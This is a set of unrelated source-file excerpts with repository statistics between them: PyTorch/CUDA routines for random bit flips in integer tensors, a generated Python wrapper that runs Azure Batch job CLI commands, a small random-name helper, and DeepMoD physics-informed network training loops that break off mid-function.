assert is_cuda(zero_prob) is cuda
assert (one_prob.dtype == torch.float)
assert is_cuda(one_prob) is cuda
assert len(input.shape) + 1 == len(rand.shape), (input.shape, rand.shape)
assert len(input.shape) + 1 == len(zero_prob.shape), (input.shape, zero_prob.shape)
assert len(input.shape) + 1 == len(one_prob.shape), (input.shape, one_prob.shape)
for d in range(len(input.shape)):
assert input.shape[d] == rand.shape[d], (input.shape, rand.shape, d)
assert input.shape[d] == zero_prob.shape[d], (input.shape, zero_prob.shape, d)
assert input.shape[d] == one_prob.shape[d], (input.shape, one_prob.shape, d)
assert rand.shape[-1] == precision, 'precision does not match, using inferred precision: %s' % (inferred_precision == precision)
assert zero_prob.shape[-1] == precision, 'precision does not match, using inferred precision: %s' % (inferred_precision == precision)
assert one_prob.shape[-1] == precision, 'precision does not match, using inferred precision: %s' % (inferred_precision == precision)
assert len(protected_bits) == precision, 'precision does not match, using inferred precision: %s' % (inferred_precision == precision)
protected_bits = torch.tensor(protected_bits, dtype=torch.int32)
if cuda:
protected_bits = protected_bits.cuda()
output = input.new_zeros(input.shape)
n = output.nelement()
shape = list(output.shape)
grid, block = cupy.grid_block(shape)
len_protected_bits = torch.tensor(len(protected_bits), dtype=torch.int32)
type = str(input.dtype).replace('torch.', '')
if cuda:
cupy.cunnex('cupy_%sindividualrandomflip' % type)(
grid=tuple(grid),
block=tuple(block),
args=[n,
zero_prob.data_ptr(),
one_prob.data_ptr(),
protected_bits.data_ptr(),
len_protected_bits.data_ptr(),
rand.data_ptr(),
input.data_ptr(),
output.data_ptr()],
stream=cupy.Stream
)
else:
_n = cffi.ffi.cast('int', n)
_zero_prob = cffi.ffi.cast('float*', zero_prob.data_ptr())
_one_prob = cffi.ffi.cast('float*', one_prob.data_ptr())
_protected_bits = cffi.ffi.cast('int*', protected_bits.data_ptr())
_len_protected_bits = cffi.ffi.cast('int*', len_protected_bits.data_ptr())
_rand = cffi.ffi.cast('float*', rand.data_ptr())
if type == 'int32':
_input = cffi.ffi.cast('int*', input.data_ptr())
_output = cffi.ffi.cast('int*', output.data_ptr())
cffi.lib.cffi_int32individualrandomflip(_n, _zero_prob, _one_prob, _protected_bits, _len_protected_bits, _rand, _input, _output)
elif type == 'int16':
_input = cffi.ffi.cast('short*', input.data_ptr())
_output = cffi.ffi.cast('short*', output.data_ptr())
cffi.lib.cffi_int16individualrandomflip(_n, _zero_prob, _one_prob, _protected_bits, _len_protected_bits, _rand, _input, _output)
elif type == 'int8':
_input = cffi.ffi.cast('char*', input.data_ptr())
_output = cffi.ffi.cast('char*', output.data_ptr())
cffi.lib.cffi_int8individualrandomflip(_n, _zero_prob, _one_prob, _protected_bits, _len_protected_bits, _rand, _input, _output)
elif type == 'uint8':
_input = cffi.ffi.cast('unsigned char*', input.data_ptr())
_output = cffi.ffi.cast('unsigned char*', output.data_ptr())
cffi.lib.cffi_uint8individualrandomflip(_n, _zero_prob, _one_prob, _protected_bits, _len_protected_bits, _rand, _input, _output)
else:
raise NotImplementedError
return output
def int_masked_individual_random_flip(input, mask, zero_prob, one_prob, protected_bits=[0]*32, rand=None, precision=None):
"""
Randomly flip bits in a int32 tensor with the given probability to flip zeros or ones.
The mask decides which values are subject to bit flips and which are not.
Note that for zero and one probability of 0.1, the actually changed values are roughly a fraction of 0.075;
in contrast to 0.092 for the cupy version.
:param input: input tensor
:type input: torch.Tensor
:param mask: mask tensor, determining which values can be changed
:type mask: torch.Tensor
:param rand: optional tensor holding random value per bit, shape is input.shape + [32]
:type: rand: torch.Tensor
:param zero_prob: tensor for per-bit probabilities to flip a zero
:type zero_prob: torch.Tensor
:param one_prob: tensor of per-bit probabilities to flip a one
:type one_prob: torch.Tensor
:param protected_bits: list of length 32, indicating whether a bit can be flipped (1) or not (0)
:type protected_bits: [int]
:return: input with random bit flips
:rtype: torch.Tensor
"""
if not input.is_contiguous():
input = input.contiguous()
if not mask.is_contiguous():
mask = mask.contiguous()
if not zero_prob.is_contiguous():
zero_prob = zero_prob.contiguous()
if not one_prob.is_contiguous():
one_prob = one_prob.contiguous()
inferred_precision = check_type(input)
if precision is None:
precision = inferred_precision
cuda = is_cuda(input)
if rand is None:
rand = torch.rand(list(input.shape) + [precision])
if cuda:
rand = rand.cuda()
if not rand.is_contiguous():
rand = rand.contiguous()
assert (rand.dtype == torch.float)
assert is_cuda(rand) is cuda
assert (mask.dtype == torch.bool)
assert is_cuda(mask) is cuda
assert (zero_prob.dtype == torch.float)
assert is_cuda(zero_prob) is cuda
assert (one_prob.dtype == torch.float)
assert is_cuda(one_prob) is cuda
assert len(input.shape) == len(mask.shape), (input.shape, mask.shape)
assert len(input.shape) + 1 == len(rand.shape), (input.shape, rand.shape)
assert len(input.shape) + 1 == len(zero_prob.shape), (input.shape, zero_prob.shape)
assert len(input.shape) + 1 == len(one_prob.shape), (input.shape, one_prob.shape)
for d in range(len(input.shape)):
assert input.shape[d] == rand.shape[d], (input.shape, rand.shape, d)
assert input.shape[d] == mask.shape[d], (input.shape, mask.shape, d)
assert input.shape[d] == zero_prob.shape[d], (input.shape, zero_prob.shape, d)
assert input.shape[d] == one_prob.shape[d], (input.shape, one_prob.shape, d)
assert rand.shape[-1] == precision, 'precision does not match, using inferred precision: %s' % (inferred_precision == precision)
assert zero_prob.shape[-1] == precision, 'precision does not match, using inferred precision: %s' % (inferred_precision == precision)
assert one_prob.shape[-1] == precision, 'precision does not match, using inferred precision: %s' % (inferred_precision == precision)
assert len(protected_bits) == precision, 'precision does not match, using inferred precision: %s' % (inferred_precision == precision)
protected_bits = torch.tensor(protected_bits, dtype=torch.int32)
if cuda:
protected_bits = protected_bits.cuda()
output = input.new_zeros(input.shape)
n = output.nelement()
shape = list(output.shape)
grid, block = cupy.grid_block(shape)
len_protected_bits = torch.tensor(len(protected_bits), dtype=torch.int32)
type = str(input.dtype).replace('torch.', '')
if cuda:
cupy.cunnex('cupy_%smaskedindividualrandomflip' % type)(
grid=tuple(grid),
block=tuple(block),
args=[n,
zero_prob.data_ptr(),
one_prob.data_ptr(),
protected_bits.data_ptr(),
len_protected_bits.data_ptr(),
mask.data_ptr(),
rand.data_ptr(),
input.data_ptr(),
output.data_ptr()],
stream=cupy.Stream
)
else:
_n = cffi.ffi.cast('int', n)
_zero_prob = cffi.ffi.cast('float*', zero_prob.data_ptr())
_one_prob = cffi.ffi.cast('float*', one_prob.data_ptr())
_protected_bits = cffi.ffi.cast('int*', protected_bits.data_ptr())
_len_protected_bits = cffi.ffi.cast('int*', len_protected_bits.data_ptr())
_mask = cffi.ffi.cast('bool*', mask.data_ptr())
_rand = cffi.ffi.cast('float*', rand.data_ptr())
if type == 'int32':
_input = cffi.ffi.cast('int*', input.data_ptr())
_output = cffi.ffi.cast('int*', output.data_ptr())
cffi.lib.cffi_int32maskedindividualrandomflip(_n, _zero_prob, _one_prob, _protected_bits, _len_protected_bits, _mask, _rand, _input, _output)
elif type == 'int16':
_input = cffi.ffi.cast('short*', input.data_ptr())
_output = cffi.ffi.cast('short*', output.data_ptr())
cffi.lib.cffi_int16maskedindividualrandomflip(_n, _zero_prob, _one_prob, _protected_bits, _len_protected_bits, _mask, _rand, _input, _output)
elif type == 'int8':
_input = cffi.ffi.cast('char*', input.data_ptr())
_output = cffi.ffi.cast('char*', output.data_ptr())
cffi.lib.cffi_int8maskedindividualrandomflip(_n, _zero_prob, _one_prob, _protected_bits, _len_protected_bits, _mask, _rand, _input, _output)
elif type == 'uint8':
_input = cffi.ffi.cast('unsigned char*', input.data_ptr())
_output = cffi.ffi.cast('unsigned char*', output.data_ptr())
cffi.lib.cffi_uint8maskedindividualrandomflip(_n, _zero_prob, _one_prob, _protected_bits, _len_protected_bits, _mask, _rand, _input, _output)
else:
raise NotImplementedError
return output
def int_bits(input, precision=None):
"""
Read individual bits in bool tensor.
:param input: input tensor
:type input: torch.Tensor
:return: bit tensor
:rtype: torch.Tensor
"""
#assert (input.is_contiguous() == True)
if not input.is_contiguous():
input = input.contiguous()
inferred_precision = check_type(input)
if precision is None:
precision = inferred_precision
cuda = is_cuda(input)
output = torch.zeros(list(input.shape) + [precision], dtype=torch.bool)
if cuda:
output = output.cuda()
n = input.nelement()
shape = list(input.shape)
grid, block = cupy.grid_block(shape)
type = str(input.dtype).replace('torch.', '')
if cuda:
cupy.cunnex('cupy_%sbits' % type)(
grid=tuple(grid),
block=tuple(block),
args=[n,
input.data_ptr(),
output.data_ptr()],
stream=cupy.Stream
)
else:
_n = cffi.ffi.cast('int', n)
_output = cffi.ffi.cast('bool*', output.data_ptr())
if type == 'int32':
_input = cffi.ffi.cast('int*', input.data_ptr())
cffi.lib.cffi_int32bits(_n, _input, _output)
elif type == 'int16':
_input = cffi.ffi.cast('short*', input.data_ptr())
cffi.lib.cffi_int16bits(_n, _input, _output)
elif type == 'int8':
_input = cffi.ffi.cast('char*', input.data_ptr())
cffi.lib.cffi_int8bits(_n, _input, _output)
elif type == 'uint8':
_input = cffi.ffi.cast('unsigned char*', input.data_ptr())
cffi.lib.cffi_uint8bits(_n, _input, _output)
else:
raise NotImplementedError
return output
| 38.315711
| 160
| 0.619107
| 6,658
| 51,458
| 4.589066
| 0.047161
| 0.044217
| 0.055803
| 0.023827
| 0.849611
| 0.823722
| 0.809354
| 0.793382
| 0.775119
| 0.761962
| 0
| 0.019193
| 0.252769
| 51,458
| 1,343
| 161
| 38.315711
| 0.775428
| 0.174025
| 0
| 0.722096
| 0
| 0
| 0.05938
| 0.002528
| 0
| 0
| 0
| 0
| 0.103645
| 1
| 0.023918
| false
| 0
| 0.005695
| 0
| 0.058087
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
187e713fe2a265d88bee4f231eafaf54aab6b948
| 5,986
|
py
|
Python
|
test/pyaz/batch/job/__init__.py
|
bigdatamoore/py-az-cli
|
54383a4ee7cc77556f6183e74e992eec95b28e01
|
[
"MIT"
] | null | null | null |
test/pyaz/batch/job/__init__.py
|
bigdatamoore/py-az-cli
|
54383a4ee7cc77556f6183e74e992eec95b28e01
|
[
"MIT"
] | 9
|
2021-09-24T16:37:24.000Z
|
2021-12-24T00:39:19.000Z
|
test/pyaz/batch/job/__init__.py
|
bigdatamoore/py-az-cli
|
54383a4ee7cc77556f6183e74e992eec95b28e01
|
[
"MIT"
] | null | null | null |
import json, subprocess
from ... pyaz_utils import get_cli_name, get_params
def create(priority=None, max_parallel_tasks=None, job_max_wall_clock_time=None, job_max_task_retry_count=None, id=None, job_manager_task_id=None, job_manager_task_command_line=None, job_manager_task_resource_files=None, job_manager_task_environment_settings=None, required_slots=None, pool_id=None, metadata=None, uses_task_dependencies=None, json_file=None, account_name=None, account_key=None, account_endpoint=None):
params = get_params(locals())
command = "az batch job create " + params
print(command)
output = subprocess.run(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout = output.stdout.decode("utf-8")
stderr = output.stderr.decode("utf-8")
if stdout:
return json.loads(stdout)
print(stdout)
else:
raise Exception(stderr)
print(stderr)
def delete(job_id, if_match=None, if_none_match=None, if_modified_since=None, if_unmodified_since=None, yes=None, account_name=None, account_key=None, account_endpoint=None):
params = get_params(locals())
command = "az batch job delete " + params
print(command)
output = subprocess.run(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout = output.stdout.decode("utf-8")
stderr = output.stderr.decode("utf-8")
if stdout:
return json.loads(stdout)
print(stdout)
else:
raise Exception(stderr)
print(stderr)
def show(job_id, select=None, expand=None, if_match=None, if_none_match=None, if_modified_since=None, if_unmodified_since=None, account_name=None, account_key=None, account_endpoint=None):
params = get_params(locals())
command = "az batch job show " + params
print(command)
output = subprocess.run(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout = output.stdout.decode("utf-8")
stderr = output.stderr.decode("utf-8")
if stdout:
return json.loads(stdout)
print(stdout)
else:
raise Exception(stderr)
print(stderr)
def set(job_id, priority=None, max_parallel_tasks=None, on_all_tasks_complete=None, job_max_wall_clock_time=None, job_max_task_retry_count=None, pool_id=None, metadata=None, json_file=None, if_match=None, if_none_match=None, if_modified_since=None, if_unmodified_since=None, account_name=None, account_key=None, account_endpoint=None):
params = get_params(locals())
command = "az batch job set " + params
print(command)
output = subprocess.run(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout = output.stdout.decode("utf-8")
stderr = output.stderr.decode("utf-8")
if stdout:
return json.loads(stdout)
print(stdout)
else:
raise Exception(stderr)
print(stderr)
def reset(job_id, priority=None, job_max_wall_clock_time=None, job_max_task_retry_count=None, pool_id=None, metadata=None, on_all_tasks_complete=None, json_file=None, if_match=None, if_none_match=None, if_modified_since=None, if_unmodified_since=None, account_name=None, account_key=None, account_endpoint=None):
params = get_params(locals())
command = "az batch job reset " + params
print(command)
output = subprocess.run(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout = output.stdout.decode("utf-8")
stderr = output.stderr.decode("utf-8")
if stdout:
return json.loads(stdout)
print(stdout)
else:
raise Exception(stderr)
print(stderr)
def list(account_name=None, account_key=None, account_endpoint=None, job_schedule_id=None, filter=None, select=None, expand=None):
params = get_params(locals())
command = "az batch job list " + params
print(command)
output = subprocess.run(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout = output.stdout.decode("utf-8")
stderr = output.stderr.decode("utf-8")
if stdout:
return json.loads(stdout)
print(stdout)
else:
raise Exception(stderr)
print(stderr)
def disable(job_id, disable_tasks=None, if_match=None, if_none_match=None, if_modified_since=None, if_unmodified_since=None, account_name=None, account_key=None, account_endpoint=None):
params = get_params(locals())
command = "az batch job disable " + params
print(command)
output = subprocess.run(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout = output.stdout.decode("utf-8")
stderr = output.stderr.decode("utf-8")
if stdout:
return json.loads(stdout)
print(stdout)
else:
raise Exception(stderr)
print(stderr)
def enable(job_id, if_match=None, if_none_match=None, if_modified_since=None, if_unmodified_since=None, account_name=None, account_key=None, account_endpoint=None):
params = get_params(locals())
command = "az batch job enable " + params
print(command)
output = subprocess.run(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout = output.stdout.decode("utf-8")
stderr = output.stderr.decode("utf-8")
if stdout:
return json.loads(stdout)
print(stdout)
else:
raise Exception(stderr)
print(stderr)
def stop(job_id, terminate_reason=None, if_match=None, if_none_match=None, if_modified_since=None, if_unmodified_since=None, account_name=None, account_key=None, account_endpoint=None):
params = get_params(locals())
command = "az batch job stop " + params
print(command)
output = subprocess.run(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout = output.stdout.decode("utf-8")
stderr = output.stderr.decode("utf-8")
if stdout:
return json.loads(stdout)
print(stdout)
else:
raise Exception(stderr)
print(stderr)
| 46.046154
| 420
| 0.710992
| 818
| 5,986
| 5.00978
| 0.102689
| 0.06979
| 0.043924
| 0.048316
| 0.902147
| 0.892387
| 0.862616
| 0.862616
| 0.862616
| 0.840654
| 0
| 0.003657
| 0.177748
| 5,986
| 129
| 421
| 46.403101
| 0.828931
| 0
| 0
| 0.831933
| 0
| 0
| 0.043602
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.07563
| false
| 0
| 0.016807
| 0
| 0.168067
| 0.226891
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
43f245476f07b646820f3f402c090762fa2dd004
| 83
|
py
|
Python
|
randname.py
|
liltmagicbox/material_viewer
|
cfc9d91ebcf895bb642ce1aa0d0aaad3c97f4085
|
[
"MIT"
] | null | null | null |
randname.py
|
liltmagicbox/material_viewer
|
cfc9d91ebcf895bb642ce1aa0d0aaad3c97f4085
|
[
"MIT"
] | null | null | null |
randname.py
|
liltmagicbox/material_viewer
|
cfc9d91ebcf895bb642ce1aa0d0aaad3c97f4085
|
[
"MIT"
] | null | null | null |
from random import randint
def barrand6():
return '_'+str( randint(1,1000000))
| 20.75
| 39
| 0.710843
| 11
| 83
| 5.272727
| 0.909091
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.128571
| 0.156627
| 83
| 3
| 40
| 27.666667
| 0.7
| 0
| 0
| 0
| 0
| 0
| 0.012048
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| true
| 0
| 0.333333
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 1
| 1
| 0
|
0
| 7
|
a1795c4734b2ec37f6e0b22643bda203d0087186
| 30,207
|
py
|
Python
|
experiments/KS/experiment_code.py
|
GJBoth/MultiTaskPINN
|
8a9bb23b8bfc0d0f678090e015316dbd0cfbf024
|
[
"MIT"
] | null | null | null |
experiments/KS/experiment_code.py
|
GJBoth/MultiTaskPINN
|
8a9bb23b8bfc0d0f678090e015316dbd0cfbf024
|
[
"MIT"
] | null | null | null |
experiments/KS/experiment_code.py
|
GJBoth/MultiTaskPINN
|
8a9bb23b8bfc0d0f678090e015316dbd0cfbf024
|
[
"MIT"
] | 1
|
2022-02-24T04:27:25.000Z
|
2022-02-24T04:27:25.000Z
|
from multitaskpinn.utils.tensorboard import Tensorboard
from multitaskpinn.utils.output import progress
from multitaskpinn.model.deepmod import DeepMoD
from typing import Optional
import torch
import time
import numpy as np
from torch.distributions.studentT import StudentT
def train(model: DeepMoD,
data: torch.Tensor,
target: torch.Tensor,
optimizer,
sparsity_scheduler,
reg_weight,
split: float = 0.8,
log_dir: Optional[str] = None,
max_iterations: int = 10000,
write_iterations: int = 25,
**convergence_kwargs) -> None:
"""Stops training when it reaches minimum MSE.
Args:
model (DeepMoD): [description]
data (torch.Tensor): [description]
target (torch.Tensor): [description]
optimizer ([type]): [description]
sparsity_scheduler ([type]): [description]
log_dir (Optional[str], optional): [description]. Defaults to None.
max_iterations (int, optional): [description]. Defaults to 10000.
"""
start_time = time.time()
board = Tensorboard(log_dir) # initializing tb board
# Splitting data, assumes data is already randomized
n_train = int(split * data.shape[0])
n_test = data.shape[0] - n_train
data_train, data_test = torch.split(data, [n_train, n_test], dim=0)
target_train, target_test = torch.split(target, [n_train, n_test], dim=0)
# Training
print('| Iteration | Progress | Time remaining | Loss | MSE | Reg | L1 norm |')
for iteration in np.arange(0, max_iterations + 1):
# ================== Training Model ============================
prediction, time_derivs, thetas = model(data_train)
MSE = torch.mean((prediction - target_train)**2, dim=0) # loss per output
Reg = torch.stack([torch.mean((dt - theta @ coeff_vector)**2)
for dt, theta, coeff_vector in zip(time_derivs, thetas, model.constraint_coeffs(scaled=False, sparse=True))])
loss = torch.sum(MSE + reg_weight * Reg)
# Optimizer step
optimizer.zero_grad()
loss.backward()
optimizer.step()
if iteration % write_iterations == 0:
# ================== Validation costs ================
prediction_test, coordinates = model.func_approx(data_test)
time_derivs_test, thetas_test = model.library((prediction_test, coordinates))
with torch.no_grad():
MSE_test = torch.mean((prediction_test - target_test)**2, dim=0) # loss per output
Reg_test = torch.stack([torch.mean((dt - theta @ coeff_vector)**2)
for dt, theta, coeff_vector in zip(time_derivs_test, thetas_test, model.constraint_coeffs(scaled=False, sparse=True))])
loss_test = torch.sum(MSE_test + reg_weight * Reg_test)
# ====================== Logging =======================
_ = model.sparse_estimator(thetas, time_derivs) # calculating l1 adjusted coeffs but not setting mask
estimator_coeff_vectors = model.estimator_coeffs()
l1_norm = torch.sum(torch.abs(torch.cat(model.constraint_coeffs(sparse=True, scaled=True), dim=1)), dim=0)
progress(iteration, start_time, max_iterations, loss.item(),
torch.sum(MSE).item(), torch.sum(Reg).item(), torch.sum(l1_norm).item())
board.write(iteration, loss, MSE, Reg, l1_norm, model.constraint_coeffs(sparse=True, scaled=True), model.constraint_coeffs(sparse=True, scaled=False), estimator_coeff_vectors, MSE_test=MSE_test, Reg_test=Reg_test, loss_test=loss_test)
# ================== Sparsity update =============
# Updating sparsity and or convergence
if iteration % write_iterations == 0:
sparsity_scheduler(iteration, torch.sum(MSE_test), model, optimizer)
if sparsity_scheduler.apply_sparsity is True:
with torch.no_grad():
model.constraint.sparsity_masks = model.sparse_estimator(thetas, time_derivs)
break
board.close()
def train_mt(model: DeepMoD,
data: torch.Tensor,
target: torch.Tensor,
optimizer,
sparsity_scheduler,
split: float = 0.8,
log_dir: Optional[str] = None,
max_iterations: int = 10000,
write_iterations: int = 25,
**convergence_kwargs) -> None:
"""Stops training when it reaches minimum MSE.
Args:
model (DeepMoD): [description]
data (torch.Tensor): [description]
target (torch.Tensor): [description]
optimizer ([type]): [description]
sparsity_scheduler ([type]): [description]
log_dir (Optional[str], optional): [description]. Defaults to None.
max_iterations (int, optional): [description]. Defaults to 10000.
"""
start_time = time.time()
board = Tensorboard(log_dir) # initializing tb board
# Splitting data, assumes data is already randomized
n_train = int(split * data.shape[0])
n_test = data.shape[0] - n_train
data_train, data_test = torch.split(data, [n_train, n_test], dim=0)
target_train, target_test = torch.split(target, [n_train, n_test], dim=0)
cutoff = torch.tensor(15.).to(target.device)
# Training
print('| Iteration | Progress | Time remaining | Loss | MSE | Reg | L1 norm |')
for iteration in np.arange(0, max_iterations + 1):
# ================== Training Model ============================
prediction, time_derivs, thetas = model(data_train)
MSE = torch.mean((prediction - target_train)**2, dim=0) # loss per output
Reg = torch.stack([torch.mean((dt - theta @ coeff_vector)**2)
for dt, theta, coeff_vector in zip(time_derivs, thetas, model.constraint_coeffs(scaled=False, sparse=True))])
s_capped = torch.min(torch.max(model.s, -cutoff), cutoff)
loss = torch.sum(2 * torch.exp(-s_capped[:, 0]) * MSE + torch.exp(-s_capped[:, 1]) * Reg + torch.sum(s_capped))
# Optimizer step
optimizer.zero_grad()
loss.backward()
optimizer.step()
if iteration % write_iterations == 0:
# ================== Validation costs ================
prediction_test, coordinates = model.func_approx(data_test)
time_derivs_test, thetas_test = model.library((prediction_test, coordinates))
with torch.no_grad():
MSE_test = torch.mean((prediction_test - target_test)**2, dim=0) # loss per output
Reg_test = torch.stack([torch.mean((dt - theta @ coeff_vector)**2)
for dt, theta, coeff_vector in zip(time_derivs_test, thetas_test, model.constraint_coeffs(scaled=False, sparse=True))])
loss_test = torch.sum(torch.exp(-s_capped[:, 0]) * MSE_test + torch.exp(-s_capped[:, 1]) * Reg_test + torch.sum(s_capped))
# ====================== Logging =======================
_ = model.sparse_estimator(thetas, time_derivs) # calculating l1 adjusted coeffs but not setting mask
estimator_coeff_vectors = model.estimator_coeffs()
l1_norm = torch.sum(torch.abs(torch.cat(model.constraint_coeffs(sparse=True, scaled=True), dim=1)), dim=0)
progress(iteration, start_time, max_iterations, loss.item(),
torch.sum(MSE).item(), torch.sum(Reg).item(), torch.sum(l1_norm).item())
board.write(iteration, loss, MSE, Reg, l1_norm, model.constraint_coeffs(sparse=True, scaled=True), model.constraint_coeffs(sparse=True, scaled=False), estimator_coeff_vectors, MSE_test=MSE_test, Reg_test=Reg_test, loss_test=loss_test, s=model.s)
# ================== Sparsity update =============
# Updating sparsity and or convergence
if iteration % write_iterations == 0:
sparsity_scheduler(iteration, torch.sum(MSE_test), model, optimizer)
if sparsity_scheduler.apply_sparsity is True:
with torch.no_grad():
model.constraint.sparsity_masks = model.sparse_estimator(thetas, time_derivs)
break
board.close()
def train_gradnorm(model: DeepMoD,
data: torch.Tensor,
target: torch.Tensor,
optimizer,
sparsity_scheduler,
alpha,
split: float = 0.8,
log_dir: Optional[str] = None,
max_iterations: int = 10000,
write_iterations: int = 25,
**convergence_kwargs) -> None:
"""Stops training when it reaches minimum MSE.
Args:
model (DeepMoD): [description]
data (torch.Tensor): [description]
target (torch.Tensor): [description]
optimizer ([type]): [description]
sparsity_scheduler ([type]): [description]
log_dir (Optional[str], optional): [description]. Defaults to None.
max_iterations (int, optional): [description]. Defaults to 10000.
"""
start_time = time.time()
board = Tensorboard(log_dir) # initializing tb board
# Splitting data, assumes data is already randomized
n_train = int(split * data.shape[0])
n_test = data.shape[0] - n_train
data_train, data_test = torch.split(data, [n_train, n_test], dim=0)
target_train, target_test = torch.split(target, [n_train, n_test], dim=0)
# Training
print('| Iteration | Progress | Time remaining | Loss | MSE | Reg | L1 norm |')
for iteration in np.arange(0, max_iterations + 1):
# ================== Training Model ============================
prediction, time_derivs, thetas = model(data_train)
MSE = torch.mean((prediction - target_train)**2, dim=0) # loss per output
Reg = torch.cat([torch.mean((dt - theta @ coeff_vector)**2, dim=0)
for dt, theta, coeff_vector in zip(time_derivs, thetas, model.constraint_coeffs(scaled=False, sparse=True))])
task_loss = (torch.exp(model.weights) * torch.stack((MSE, Reg), axis=1)).flatten() # weighted losses
loss = torch.sum(task_loss)
if iteration == 0: # Getting initial loss
ini_loss = task_loss.data
if torch.any(task_loss.data > ini_loss):
ini_loss[task_loss.data > ini_loss] = task_loss.data[task_loss.data > ini_loss]
# Getting original grads
optimizer.zero_grad()
loss.backward(retain_graph=True)
model.weights.grad.data = model.weights.grad.data * 0.0 # setting weight grads to zero
# Getting Grads to normalize
G = torch.tensor([torch.norm(torch.autograd.grad(loss_i, list(model.parameters())[-2], retain_graph=True, create_graph=True)[0], 2) for loss_i in task_loss]).to(data.device)
G_mean = torch.mean(G)
# Calculating relative losses
rel_loss = task_loss / ini_loss
inv_train_rate = rel_loss / torch.mean(rel_loss)
# Calculating grad norm loss
grad_norm_loss = torch.sum(torch.abs(G - G_mean * inv_train_rate ** alpha))
# Setting grads
model.weights.grad = torch.autograd.grad(grad_norm_loss, model.weights)[0]
# do a step with the optimizer
optimizer.step()
# renormalize
normalize_coeff = task_loss.shape[0] / torch.sum(model.weights)
model.weights.data = torch.log(torch.exp(model.weights.data) * normalize_coeff)
if iteration % write_iterations == 0:
# ================== Validation costs ================
prediction_test, coordinates = model.func_approx(data_test)
time_derivs_test, thetas_test = model.library((prediction_test, coordinates))
with torch.no_grad():
MSE_test = torch.mean((prediction_test - target_test)**2, dim=0) # loss per output
Reg_test = torch.stack([torch.mean((dt - theta @ coeff_vector)**2)
for dt, theta, coeff_vector in zip(time_derivs_test, thetas_test, model.constraint_coeffs(scaled=False, sparse=True))])
loss_test = model.weights @ torch.stack((MSE, Reg), axis=0)
# ====================== Logging =======================
_ = model.sparse_estimator(thetas, time_derivs) # calculating l1 adjusted coeffs but not setting mask
estimator_coeff_vectors = model.estimator_coeffs()
l1_norm = torch.sum(torch.abs(torch.cat(model.constraint_coeffs(sparse=True, scaled=True), dim=1)), dim=0)
progress(iteration, start_time, max_iterations, loss.item(),
torch.sum(MSE).item(), torch.sum(Reg).item(), torch.sum(l1_norm).item())
board.write(iteration, loss, MSE, Reg, l1_norm, model.constraint_coeffs(sparse=True, scaled=True), model.constraint_coeffs(sparse=True, scaled=False), estimator_coeff_vectors, MSE_test=MSE_test, Reg_test=Reg_test, loss_test=loss_test, w=model.weights)
# ================== Sparsity update =============
# Updating sparsity and or convergence
if iteration % write_iterations == 0:
sparsity_scheduler(iteration, torch.sum(MSE_test), model, optimizer)
if sparsity_scheduler.apply_sparsity is True:
with torch.no_grad():
model.constraint.sparsity_masks = model.sparse_estimator(thetas, time_derivs)
break
board.close()
def train_scaled(model: DeepMoD,
data: torch.Tensor,
target: torch.Tensor,
optimizer,
sparsity_scheduler,
split: float = 0.8,
log_dir: Optional[str] = None,
max_iterations: int = 10000,
write_iterations: int = 25,
**convergence_kwargs) -> None:
"""Stops training when it reaches minimum MSE.
Args:
model (DeepMoD): [description]
data (torch.Tensor): [description]
target (torch.Tensor): [description]
optimizer ([type]): [description]
sparsity_scheduler ([type]): [description]
log_dir (Optional[str], optional): [description]. Defaults to None.
max_iterations (int, optional): [description]. Defaults to 10000.
"""
start_time = time.time()
board = Tensorboard(log_dir) # initializing tb board
# Splitting data, assumes data is already randomized
n_train = int(split * data.shape[0])
n_test = data.shape[0] - n_train
data_train, data_test = torch.split(data, [n_train, n_test], dim=0)
target_train, target_test = torch.split(target, [n_train, n_test], dim=0)
# Training
print('| Iteration | Progress | Time remaining | Loss | MSE | Reg | L1 norm |')
for iteration in np.arange(0, max_iterations + 1):
# ================== Training Model ============================
prediction, time_derivs, thetas = model(data_train)
MSE = torch.mean((prediction - target_train)**2, dim=0) # loss per output
Reg = torch.stack([torch.mean((dt - theta @ coeff_vector)**2)
for dt, theta, coeff_vector in zip(time_derivs, thetas, model.constraint_coeffs(scaled=False, sparse=True))])
loss = torch.sum(MSE + torch.exp(- MSE.data / Reg.data) * Reg)
# Optimizer step
optimizer.zero_grad()
loss.backward()
optimizer.step()
if iteration % write_iterations == 0:
# ================== Validation costs ================
prediction_test, coordinates = model.func_approx(data_test)
time_derivs_test, thetas_test = model.library((prediction_test, coordinates))
with torch.no_grad():
MSE_test = torch.mean((prediction_test - target_test)**2, dim=0) # loss per output
Reg_test = torch.stack([torch.mean((dt - theta @ coeff_vector)**2)
for dt, theta, coeff_vector in zip(time_derivs_test, thetas_test, model.constraint_coeffs(scaled=False, sparse=True))])
loss_test = torch.sum( MSE_test + Reg_test)
# ====================== Logging =======================
